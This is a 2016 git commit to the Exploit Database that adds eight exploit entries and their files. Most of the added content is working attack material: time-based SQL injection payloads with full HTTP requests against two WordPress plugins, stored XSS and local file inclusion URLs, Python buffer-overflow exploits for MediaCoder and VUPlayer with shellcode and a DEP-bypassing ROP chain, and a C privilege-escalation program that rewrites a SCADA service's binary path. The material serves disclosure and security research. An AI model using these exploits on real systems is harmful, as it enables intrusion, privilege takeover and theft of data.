DB: 2016-07-08

8 new exploits

WordPress Q and A (Focus Plus) FAQ Plugin 1.3.9.7 - Multiple Vulnerabilities
WordPress Huge-IT Image Gallery Plugin 1.8.9 - Multiple Vulnerabilities

Codoforum 3.4 - Stored Cross-Site Scripting
MediaCoder 0.8.43.5830 - .m3u Buffer Overflow SEH Exploit
VUPlayer 2.49 - .m3u Buffer Overflow Exploit (Win 7 DEP Bypass)

Core FTP LE 2.2 - Path Field Local Buffer Overflow
OPAC KpwinSQL - Multiple Vulnerabilities
GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation
This commit is contained in:
Offensive Security 2016-07-08 05:06:14 +00:00
parent 52cf6a3185
commit c7daadde64
9 changed files with 433 additions and 0 deletions

View file

@ -36002,6 +36002,8 @@ id,file,description,date,author,platform,type,port
39803,platforms/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",windows,local,0
39804,platforms/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 - 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",windows,local,0
39805,platforms/windows/remote/39805.txt,"Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059)",2016-05-12,"Eduardo Braun Prado",windows,remote,0
39806,platforms/php/webapps/39806.txt,"WordPress Q and A (Focus Plus) FAQ Plugin 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
39807,platforms/php/webapps/39807.txt,"WordPress Huge-IT Image Gallery Plugin 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848
39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
39883,platforms/php/webapps/39883.txt,"WordPress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80
@ -36196,7 +36198,10 @@ id,file,description,date,author,platform,type,port
40012,platforms/php/webapps/40012.txt,"WordPress Ultimate Product Catalog Plugin 3.8.6 - Arbitrary File Upload",2016-06-27,"i0akiN SEC-LABORATORY",php,webapps,80
40013,platforms/php/webapps/40013.txt,"OPAC KpwinSQL - SQL Injection",2016-06-27,bRpsd,php,webapps,80
40014,platforms/hardware/dos/40014.txt,"Magnet Networks Tesley CPVA 642 Router Weak WPA-PSK Passphrase Algorithm",2016-06-27,"Matt O'Connor",hardware,dos,0
40015,platforms/php/webapps/40015.txt,"Codoforum 3.4 - Stored Cross-Site Scripting",2016-06-27,"Ahmed Sherif",php,webapps,80
40016,platforms/hardware/webapps/40016.txt,"Option CloudGate CG0192-11897 - Multiple Vulnerabilities",2016-06-27,LiquidWorm,hardware,webapps,80
40017,platforms/windows/local/40017.py,"MediaCoder 0.8.43.5830 - .m3u Buffer Overflow SEH Exploit",2016-06-27,"Sibusiso Sishi",windows,local,0
40018,platforms/windows/local/40018.py,"VUPlayer 2.49 - .m3u Buffer Overflow Exploit (Win 7 DEP Bypass)",2016-06-27,secfigo,windows,local,0
40019,platforms/php/webapps/40019.txt,"Kagao 3.0 - Multiple Vulnerabilities",2016-06-27,N4TuraL,php,webapps,80
40020,platforms/windows/local/40020.txt,"Panda Security Multiple Products - Privilege Escalation",2016-06-27,Security-Assessment.com,windows,local,0
40021,platforms/php/webapps/40021.php,"MyLittleForum 2.3.5 - PHP Command Injection",2016-06-27,hyp3rlinx,php,webapps,80
@ -36215,6 +36220,7 @@ id,file,description,date,author,platform,type,port
40035,platforms/multiple/dos/40035.txt,"Symantec Antivirus - Integer Overflow in TNEF Decoder",2016-06-29,"Google Security Research",multiple,dos,0
40036,platforms/multiple/dos/40036.txt,"Symantec Antivirus - Missing Bounds Checks in dec2zip ALPkOldFormatDecompressor::UnShrink",2016-06-29,"Google Security Research",multiple,dos,0
40037,platforms/multiple/dos/40037.txt,"Symantec Antivirus - PowerPoint Misaligned Stream-cache Remote Stack Buffer Overflow",2016-06-29,"Google Security Research",multiple,dos,0
40038,platforms/windows/dos/40038.py,"Core FTP LE 2.2 - Path Field Local Buffer Overflow",2016-06-29,Netfairy,windows,dos,0
40039,platforms/win32/local/40039.cpp,"Windows 7 SP1 x86 - Privilege Escalation (MS16-014)",2016-06-29,blomster81,win32,local,0
40040,platforms/windows/local/40040.txt,"Lenovo ThinkPad - System Management Mode Arbitrary Code Execution Exploit",2016-06-29,Cr4sh,windows,local,0
40041,platforms/php/webapps/40041.txt,"Symantec Endpoint Protection Manager 12.1 - Multiple Vulnerabilities",2016-06-29,hyp3rlinx,php,webapps,8445
@ -36238,3 +36244,5 @@ id,file,description,date,author,platform,type,port
40065,platforms/jsp/webapps/40065.txt,"OpenFire 3.10.2 - 4.0.1 - Multiple Vulnerabilities",2016-07-06,Sysdream,jsp,webapps,80
40066,platforms/android/local/40066.txt,"Samsung Android JACK - Privilege Escalation",2016-07-06,"Google Security Research",android,local,0
40067,platforms/linux/remote/40067.rb,"Nagios XI Chained Remote Code Execution",2016-07-06,metasploit,linux,remote,80
40068,platforms/php/webapps/40068.txt,"OPAC KpwinSQL - Multiple Vulnerabilities",2016-07-07,"Yakir Wizman",php,webapps,80
40069,platforms/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",windows,local,0

Can't render this file because it is too large.

71
platforms/php/webapps/39806.txt Executable file
View file

@ -0,0 +1,71 @@
# Exploit Title: WordPress Q and A (Focus Plus) FAQ Full Path Disclosure and SQL Injection
# Google Dork: inurl:"wp-content/plugins/q-and-a"
# Date: 12-05-2016
# Software Link: https://wordpress.org/plugins/q-and-a-focus-plus-faq/
# Version: 1.3.9.7 and prior
# Exploit Author: Gwendal Le Coguic
# Website: http://10degres.net
# Category: webapps
Create a powerful and easy to use FAQ & knowledge base on your WordPress site.
A powerful and easy to use full-featured FAQ with comments, tags and ratings for your WordPress site.
The plugin was originally named "Q and A FAQ" and developped by Raygun company
then it has been involved and renamed to "Q and A Focus Plus FAQ" by Lanexatek Creations.
##### Full Path Disclosure #####
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/q-and-a-focus-plus.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/admin/q-a-focus-plus-admin.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/admin/documentation.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/custom-post.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/functions.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/ratings.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/reorder.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/shortcodes.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/upgrader.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/widgets.php
##### SQL Injection #####
Those vulnerabilities are mitigated by the fact that you have to be connected as an admin to exploit them.
Paramater hdnParentID is vulnerable in two places.
Payload: 0 AND (SELECT * FROM (SELECT(SLEEP(5)))zeCb)
1/ line 46: $parentsParent = $wpdb->get_row("SELECT post_parent FROM $wpdb->posts WHERE ID = " . $_POST['hdnParentID']...
POST /wp-admin/edit.php?post_type=qa_faqs&page=faqpageorder HTTP/1.1
Host: [target]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
btnOrderPages=Click+to+Reorder+FAQs&hdnfaqpageorder=id_8%2Cid_6%2Cid_5&btnReturnParent=Return+to+parent+page&hdnParentID=0
2/ line 254: $wpdb->get_results("SELECT * FROM $wpdb->posts WHERE post_parent = $parentID and ...
POST /wp-admin/edit.php?post_type=qa_faqs&page=faqpageorder HTTP/1.1
Host: [target]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
btnOrderPages=Click+to+Reorder+FAQs&hdnfaqpageorder=id_8%2Cid_6%2Cid_5&hdnParentID=0
##### References #####
https://www.owasp.org/index.php/Full_Path_Disclosure
https://www.owasp.org/index.php/SQL_Injection

62
platforms/php/webapps/39807.txt Executable file
View file

@ -0,0 +1,62 @@
# Exploit Title: WordPress plugin Image Gallery Full Path Disclosure and SQL Injection
# Google Dork: inurl:"wp-content/plugins/gallery-images/"
# Date: 12-05-2016
# Software Link: https://fr.wordpress.org/plugins/gallery-images/
# Version: 1.8.9 and prior
# Exploit Author: Gwendal Le Coguic
# Website: http://10degres.net
# Category: webapps
##### About #####
Huge-IT Image Gallery is the best plugin to use if you want to be original with your website.
##### Full Path Disclosure #####
http://[target]/wp-content/plugins/gallery-images/gallery-images.php
##### SQL Injection #####
Headers X-Forwarded-For and Client-Ip are vulnerable.
Vulnerable code: at lines 101, 259, 420, 559, 698 the variable $huge_it_ip is missing sanitization
Payload: 123.123.123.123' AND (SELECT * FROM (SELECT(SLEEP(5)))suRI) AND 'uDsL'='uDsL
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: [target]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Client-Ip: 123.123.123.123
X-Forwarded-For: 123.123.123.123
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 89
action=huge_it_video_gallery_ajax&task=load_images_content&galleryid=1&page=1&perpage=100
### Extras infos #####
The "galleryid" must be configured or try another id.
You don't need to be authed to exploit the injection but the plugin must be enable.
"task" parameter can be:
load_images_content
load_images_lightbox
load_image_justified
load_image_thumbnail
load_blog_view
Client-Ip overwrite X-Forwarded-For.
Some system drop those headers.
##### References #####
https://www.owasp.org/index.php/Full_Path_Disclosure
https://www.owasp.org/index.php/SQL_Injection

31
platforms/php/webapps/40015.txt Executable file
View file

@ -0,0 +1,31 @@
# Exploit Title: Codoforum v3.4 Stored Cross-Site Scripting (Stored XSS)
# Google Dork: intext:"powered by codoforum"
# Date: 01/06/2016
# Exploit Author: Ahmed Sherif (OffensiveBits)
# Vendor Homepage: http://codologic.com/page/
# Software Link: http://codoforum.com/index.php
# Version: V3.4
# Tested on: Linux Mint
1. Description:
The Reply and search functionalities are both vulnerable to Stored XSS due
to improper filtration in displaying the content of replies.
2. Steps to reproduce the vulnerability:
1. Login to your account.
2. look for any topic and add a reply .
3. in the reply textbox add a widely used common keyword within xss
payload for example : (keyword"><svg/onload=prompt(document.cookie)>)
4. while any user surfing the topic and started to search for specific
keywords the javascript code will be executed.
3. Solution:
The new version of codoforum will be released this week.

36
platforms/php/webapps/40068.txt Executable file
View file

@ -0,0 +1,36 @@
OPAC KpwinSQL LFI/XSS Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product Website : http://www.kpsys.cz/
Affected version: All
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Description:
KpwinSQL suffers from an unauthenticated file inclusion vulnerability (LFI) when input passed thru the 'lang' parameter to the following scripts which are not properly verified:
+ index.php
+ help.php
+ logpin.php
+ brow.php
+ indexs.php
+ search.php
+ hledani.php
+ hled_hesl.php
before being used to include files. This can be exploited to include files from local resources with their absolute path and with directory traversal attacks.
Moreover, KpwinSQL system suffers from Cross Site Scripting vulnerability when input passed thru the 'vyhl' parameter to 'index.php' script which does not perform input validation.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Tested on: Apache/2.2.11 (Win32)
PHP/5.2.9-2
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Vulnerabilities discovered by Yakir Wizman
https://www.linkedin.com/in/yakirwizman
Date: 06.07.2016
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Proof Of Concept:
Local File Inclusion example:
http://server/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
Cross Site Scripting example:
http://server/index.php?vyhl='><script>alert('XSS')</script>&lang=cze

33
platforms/windows/dos/40038.py Executable file
View file

@ -0,0 +1,33 @@
'''
# Exploit Title: Core FTP Server v2.2 - BufferOverflow POC
# Date: 2016-6-28
# Exploit Author: Netfairy
# Vendor Homepage: http://www.coreftp.com/
# Software Link: ftp://ftp.coreftp.com/coreftplite.exe
# Version: 2.2
# Tested on: Windows7 Professional SP1 En x86
# CVE : N/A
[+] Type : Buffer overflow
[+] Detail :
[-] The vulnerability has the most typical Buffer overflow vulnerabilities.
[-] enter the application and Input "A"*800 to the path box the press enter
[-] crash info
0:008> g
(4d48.4cc8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=00440770 ecx=00410041 edx=007c4ee4 esi=00000000 edi=01b1efe8
eip=00410041 esp=0012d6a0 ebp=00410041 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\CoreFTP\coreftp.exe
coreftp+0x10041:
00410041 008b45fc8be5 add byte ptr [ebx-1A7403BBh],cl ds:0023:e5d003b5=??
########generate "A"*800
'''
import struct
junk = "A" * 800
with open("exp.txt","wb") as f :
f.write(junk)

View file

@ -0,0 +1,45 @@
#!/usr/bin/python
# Exploit Title: Mediacoder 0.8.43.5830 - Buffer Overflow SEH Exploit (.m3u)
# Date: 25-June-2016
# Exploit Author: Sibusiso Sishi
# Email: sibusiso [at] IronSky [dot] co.za
# Vendor Homepage: http://www.mediacoderhq.com/
# Software Link: http://www.mediacoderhq.com/getfile.htm?site=mediatronic.com.au/download&file=MediaCoder-0.8.43.5830.exe
# Version: 0.8.43.5830
# Tested on: Windows XP SP3 EN
#msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00\x0a\x0d\xff' -f c
shellcode = ("\xda\xca\xbb\x4a\xfa\x8e\x16\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x31\x83\xc2\x04\x31\x5a\x14\x03\x5a\x5e\x18\x7b\xea\xb6\x5e"
"\x84\x13\x46\x3f\x0c\xf6\x77\x7f\x6a\x72\x27\x4f\xf8\xd6\xcb"
"\x24\xac\xc2\x58\x48\x79\xe4\xe9\xe7\x5f\xcb\xea\x54\xa3\x4a"
"\x68\xa7\xf0\xac\x51\x68\x05\xac\x96\x95\xe4\xfc\x4f\xd1\x5b"
"\x11\xe4\xaf\x67\x9a\xb6\x3e\xe0\x7f\x0e\x40\xc1\xd1\x05\x1b"
"\xc1\xd0\xca\x17\x48\xcb\x0f\x1d\x02\x60\xfb\xe9\x95\xa0\x32"
"\x11\x39\x8d\xfb\xe0\x43\xc9\x3b\x1b\x36\x23\x38\xa6\x41\xf0"
"\x43\x7c\xc7\xe3\xe3\xf7\x7f\xc8\x12\xdb\xe6\x9b\x18\x90\x6d"
"\xc3\x3c\x27\xa1\x7f\x38\xac\x44\x50\xc9\xf6\x62\x74\x92\xad"
"\x0b\x2d\x7e\x03\x33\x2d\x21\xfc\x91\x25\xcf\xe9\xab\x67\x85"
"\xec\x3e\x12\xeb\xef\x40\x1d\x5b\x98\x71\x96\x34\xdf\x8d\x7d"
"\x71\x2f\xc4\xdc\xd3\xb8\x81\xb4\x66\xa5\x31\x63\xa4\xd0\xb1"
"\x86\x54\x27\xa9\xe2\x51\x63\x6d\x1e\x2b\xfc\x18\x20\x98\xfd"
"\x08\x43\x7f\x6e\xd0\xaa\x1a\x16\x73\xb3")
seh = "\x94\x39\xf0\x64" #0x64f03994 pop ebx # pop esi # ret swscale-3.dll
nseh = "\xeb\x07\x90\x90" #JMP SHORT to nopsled which leads to the shellcode
nop_sled = "\x90" * 14
buff = "http:// "
buff += "A" * 776
buff += nseh
buff += seh
buff += nop_sled
buff += shellcode
buff += "D" * (4216 - (len(shellcode + nop_sled)))
fo = open("foo.m3u", "wb")
fo.write (buff)
fo.close()

View file

@ -0,0 +1,88 @@
#!/usr/bin/env python
#
# Exploit Title: VUPlayer <=2.49 .M3u Buffer overflow exploit with DEP bypass
# Date: 26-06-2016
# Exploit Author: secfigo
# Vendor Homepage: http://vuplayer.com/
# Software Link: https://www.exploit-db.com/apps/39adeb7fa4711cd1cac8702fb163ded5-vuplayersetup.exe
# Version: VUPlayer <=2.49
# Tested on: Windows 7 SP1 DEP=alwayson
# Greetz: Raghu, nullSingapore
###################################################################################
import struct
###################################################################################
# Shellcode
# windows/exec CMD=calc.exe with size 227 and bad characters "\x00\x09\x0a\x0d\x1a"
###################################################################################
shellcode = ("\xbb\xc7\x16\xe0\xde\xda\xcc\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x33\x83\xc0\x04\x31\x58\x0e\x03\x9f\x18\x02\x2b\xe3\xcd\x4b"
"\xd4\x1b\x0e\x2c\x5c\xfe\x3f\x7e\x3a\x8b\x12\x4e\x48\xd9\x9e"
"\x25\x1c\xc9\x15\x4b\x89\xfe\x9e\xe6\xef\x31\x1e\xc7\x2f\x9d"
"\xdc\x49\xcc\xdf\x30\xaa\xed\x10\x45\xab\x2a\x4c\xa6\xf9\xe3"
"\x1b\x15\xee\x80\x59\xa6\x0f\x47\xd6\x96\x77\xe2\x28\x62\xc2"
"\xed\x78\xdb\x59\xa5\x60\x57\x05\x16\x91\xb4\x55\x6a\xd8\xb1"
"\xae\x18\xdb\x13\xff\xe1\xea\x5b\xac\xdf\xc3\x51\xac\x18\xe3"
"\x89\xdb\x52\x10\x37\xdc\xa0\x6b\xe3\x69\x35\xcb\x60\xc9\x9d"
"\xea\xa5\x8c\x56\xe0\x02\xda\x31\xe4\x95\x0f\x4a\x10\x1d\xae"
"\x9d\x91\x65\x95\x39\xfa\x3e\xb4\x18\xa6\x91\xc9\x7b\x0e\x4d"
"\x6c\xf7\xbc\x9a\x16\x5a\xaa\x5d\x9a\xe0\x93\x5e\xa4\xea\xb3"
"\x36\x95\x61\x5c\x40\x2a\xa0\x19\xbe\x60\xe9\x0b\x57\x2d\x7b"
"\x0e\x3a\xce\x51\x4c\x43\x4d\x50\x2c\xb0\x4d\x11\x29\xfc\xc9"
"\xc9\x43\x6d\xbc\xed\xf0\x8e\x95\x8d\x97\x1c\x75\x7c\x32\xa5"
"\x1c\x80")
junk = "HTTP://" + "A"*1005
###################################################################################
# rop gadgets with some modifications
# bad characters = "\x00\x09\x0a\x0d\x1a"
###################################################################################
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x10010157, # POP EBP # RETN [BASS.dll]
0x10010157, # skip 4 bytes [BASS.dll]
0x10015f77, # POP EAX # RETN [BASS.dll]
0xfffffdff, # Value to negate, will become 0x00000201
0x10014db4, # NEG EAX # RETN [BASS.dll]
0x10032f72, # XCHG EAX,EBX # RETN 0x00 [BASS.dll]
0x10015f82, # POP EAX # RETN [BASS.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x10014db4, # NEG EAX # RETN [BASS.dll]
0x10038a6d, # XCHG EAX,EDX # RETN [BASS.dll]
0x101049ec, # POP ECX # RETN [BASSWMA.dll]
0x101082db, # &Writable location [BASSWMA.dll]
0x1001621c, # POP EDI # RETN [BASS.dll]
0x1001dc05, # RETN (ROP NOP) [BASS.dll]
0x10604154, # POP ESI # RETN [BASSMIDI.dll]
0x10101c02, # JMP [EAX] [BASSWMA.dll]
0x10015fe7, # POP EAX # RETN [BASS.dll]
0x1060e25c, # ptr to &VirtualProtect() [IAT BASSMIDI.dll]
0x1001d7a5, # PUSHAD # RETN [BASS.dll]
0x10022aa7, # ptr to 'jmp esp' [BASS.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
eip = struct.pack('<L',0x10601033) # RETN (BASSMIDI.dll)
nops ="\x90"* 16
buffer = junk + eip + rop_chain + nops+ shellcode+ "C"*(3000-len(junk)-len(eip)-len(rop_chain)-len(nops)-len(shellcode))
print "[+] Creating .m3u file of size "+ str(len(buffer))
file = open('vuplayer-dep.m3u','w');
file.write(buffer);
file.close();
print "[+] Done creating the file"

View file

@ -0,0 +1,59 @@
/*
# Exploit Title: GE Proficy HMI/SCADA CIMPLICITY 8.2 Local Privilege Escalation Exploit(0 day)
# Vulnerability Discovery and Exploit Author: Zhou Yu
# Email: <504137480@qq.com>
# Version: 8.2
# Tested on: Windows 7 SP1 X32
# CVE : None
Vulnerability Description:
SERVICE_CHANGE_CONFIG Privilege Escalation
C:\Users\lenovo\Desktop\AccessChk>accesschk.exe -q -v -c CimProxy
CimProxy
Medium Mandatory Level (Default) [No-Write-Up]
RW Everyone
SERVICE_ALL_ACCESS
C:\Users\lenovo\Desktop\AccessChk>sc qc CimProxy
[SC] QueryServiceConfig <EFBFBD>ɹ<EFBFBD>
SERVICE_NAME: CimProxy
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Proficy\Proficy CIMPLICITY\exe\Cim
Proxy.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : CIMPLICITY Proxy Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Usage:
Put evil.exe and the exploit in the same folder and then run the exploit.
*/
#include <windows.h>
#include <stdio.h>
#include <string.h>
void main()
{
char szPath[MAX_PATH];
char *t;
GetModuleFileName(NULL,szPath,MAX_PATH);
t = strrchr(szPath, 0x5C);
t[0] = '\\';
t[1] = '\0';
strcat(szPath,"evil.exe\"");
char t1[] = "\"cmd.exe /c ";
char payload[] = "sc config CimProxy binPath= ";
strcat(t1,szPath);
strcat(payload,t1);
system(payload);
//stop service
printf("stop service!\n");
system("net stop CimProxy");
//start service
printf("start service!\n");
system("net start CimProxy");
}